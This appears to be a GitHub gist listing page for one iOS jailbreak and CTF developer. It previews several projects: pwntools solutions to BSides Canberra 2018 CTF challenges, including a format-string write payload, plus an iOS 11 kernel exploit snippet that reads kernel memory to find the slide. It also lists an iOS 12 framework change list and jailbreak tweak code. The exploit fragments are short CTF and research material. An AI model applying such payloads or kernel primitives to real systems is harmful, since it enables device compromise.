George Dan ninjaprawn

ninjaprawn /
Created Jul 17, 2018
Solution to Neo Boffy from the BSides Canberra CTF 2018
from pwn import *
bin_path = "./neo_boffy"
# Don't want pwntools writing to the console every time we spawn a binary, since we are spawning a lot of binaries
# Can't send NULLs, but can send empty strings
def cmdify(s): return s.split("\x00")  # split on NULs so each piece can be sent as a separate (possibly empty) string
ninjaprawn / dsc_changes
Created Jun 4, 2018
Changes in the iOS 12 dsc
View dsc_changes
- /System/Library/AccessibilityBundles/AXActionSheetUIServer.axuiservice/AXActionSheetUIServer
- /System/Library/Frameworks/AuthenticationServices.framework/AuthenticationServices
- /System/Library/Frameworks/CarPlay.framework/CarPlay
- /System/Library/Frameworks/CoreServices.framework/CoreServices
- /System/Library/Frameworks/CoreTelephony.framework/Support/libSystemDetermination.dylib
- /System/Library/Frameworks/GLKit.framework/GLKit
- /System/Library/Frameworks/IdentityLookupUI.framework/IdentityLookupUI
- /System/Library/Frameworks/MetalPerformanceShaders.framework/Frameworks/MPSRayIntersector.framework/MPSRayIntersector
- /System/Library/Frameworks/NaturalLanguage.framework/NaturalLanguage
ninjaprawn /
Created May 31, 2018
Solution to Fat Morphine from the BSides Canberra CTF 2018
from pwn import *
bin_path = "./fat_morphine"
payload = ""
payload += "%4196134x" # What we are writing
payload += "%{}$lln" # How we write it
payload += "\x30\x0d\x60" # Where we write it
payload = payload.format(10)
ninjaprawn / slide.c
Last active Dec 12, 2017
async_wake_ios slide calculator - based off Siguza's v0rtex method of calculating the slide
View slide.c
Offsets from iOS 11.1.2 iPhone 6+
Insert the following after line 680 in async_wait.c
Mostly from Siguza's v0rtex
mach_ports_register(mach_task_self(), &user_client, 1);
uint64_t IOSurfaceRootUserClient_port = rk64(task_addr + 0x2e8 + 0x8); // 0x2e8 = OFFSET_TASK_ITK_REGISTERED, second port in the list
uint64_t IOSurfaceRootUserClient_addr = rk64(IOSurfaceRootUserClient_port + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT));
uint64_t IOSurfaceRootUserClient_vtab = rk64(IOSurfaceRootUserClient_addr);
View installing theos
brew install dpkg ldid
cd ~
git clone --recursive
echo "export THEOS=~/theos" >> .bash_profile
View limitless301016.log
Showing All Messages
Build target Limitless of project Limitless with configuration Debug
PhaseScriptExecution Symlinks\ Setup /Users/ninja/Library/Developer/Xcode/DerivedData/Limitless-ffaafdspyfyrqgberifhaiobmnbg/Build/Intermediates/
cd /Volumes/Files/Developer/Limitless
export ACTION=build
export ALTERNATE_GROUP=staff
View wtf.xm
@property (strong, nonatomic) NSString *currentPhoneNumber;
-(NSMutableArray*)getHiddenNumbers {
    NSArray *hiddenNumbers = [[NSUserDefaults standardUserDefaults] objectForKey:@"hiddenNumbers"];
    if (hiddenNumbers == nil) {
        return [[NSMutableArray alloc] init];
    }
    return [NSMutableArray arrayWithArray:hiddenNumbers];
}
ninjaprawn / privateclassaccessability
Created Dec 24, 2015
List of private classes/functions that can be accessed magically
View privateclassaccessability
SBUIController - NO (Protected by FrontBoard)
SBIconController - NO (Protected by FrontBoard)
SBPowerDownController - YES (assertion failure in -[SBPowerDownController _screen])
SBWallpaperController - NO (Protected by FrontBoard)
SpringBoard (actual app) - YES (Not sure how to fetch, Only one UIApp can be active at one time)
ninjaprawn / record.xm
Created Oct 24, 2015
random attempt to record screen
View record.xm
%hook BSPlatform
- (BOOL)isInternalInstall {
    return YES;
}
%end
ninjaprawn / tweak.xm
Last active Aug 10, 2016
it was greeny D:
View tweak.xm
@interface SBApplicationController
-(id)applicationWithBundleIdentifier:(id)arg1;
@end
@interface SBApplication
@end
@interface SBApplicationIcon : NSObject
-(id)initWithApplication:(id)arg1;
@end